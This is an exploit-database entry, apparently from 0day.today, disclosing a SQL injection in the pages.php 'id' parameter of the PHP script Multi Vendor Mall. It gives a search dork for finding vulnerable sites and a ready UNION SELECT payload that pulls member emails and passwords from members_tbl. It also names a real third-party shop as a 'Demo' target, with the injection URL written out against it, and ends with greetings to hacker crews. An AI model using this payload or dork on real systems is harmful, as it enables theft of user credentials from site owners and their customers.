作者

Newbie_Campuz

风险

[

安全风险级别 － 未分类

]

0day-ID

0day-ID-12405

类别

web applications

添加日期

26-05-2010

平台

php

=============================================
Multi Vendor Mall SQL Injection Vulnerability
=============================================


#################################################################################################

[+] Multi Vendor Mall (pages.php) SQL Injection Vulnerability

[+] By Newbie_Campuz

[+] Published: 2010-05-24 Pukul 22.00 WIB

[+] jatimcrew.org/

##################################################################################################

# Script Homepage:
# http://www.multishopcms.com

[+]Dork: pages.php?id= "Multi Vendor Mall"

[+] SQL Injection


	http://[target]/[path]/pages.php?id=[SQL]

	http://[target]/[path]/pages.php?id=-9999+union+select+group_concat(EMAIL,0x3a3a,PASSWORD,0x3c62723e)+from+members_tbl--


Demo : 	http://www.bestcraftsupplies.com/pages.php?id=7

       	http://www.bestcraftsupplies.com/pages.php?id=7+union+select+group_concat(EMAIL,0x3a3a,PASSWORD,0x3c62723e)+from+members_tbl--

##################################################################################################
Thanks to Allah SWT n Nabi Muhammad SAW

Special Thanks to : 	
My Parent, My Brother n My Sister
Byz9991, Doraemon, Bang_Napi, Kenthot_cakep, Bom2, Shamus, Chapzha, Ficarciruas, pheonixhaxor, mywisdom, 
Pr3tty, newbie_043, KidDevilz, Android2009, XcyberX, flyff666, MISTERFRIBO, Osean, Vhacx,jamsh0ut, elfata
cybermuttaqin,k3m4ngi, roentah,zhombhie, techno_x46 and YOU... !!!

All admin, momod, spamguard, staff and member Jatim Crew..
All admin, momod, spamguard, staff and member Indonesianhacker
All admin, momod, spamguard, staff and member xteamweb
All admin, momod, spamguard, staff and member h2ozones
All admin, momod, spamguard, staff and member master-forum
##################################################################################################




#  0day.today [2024-07-16]  #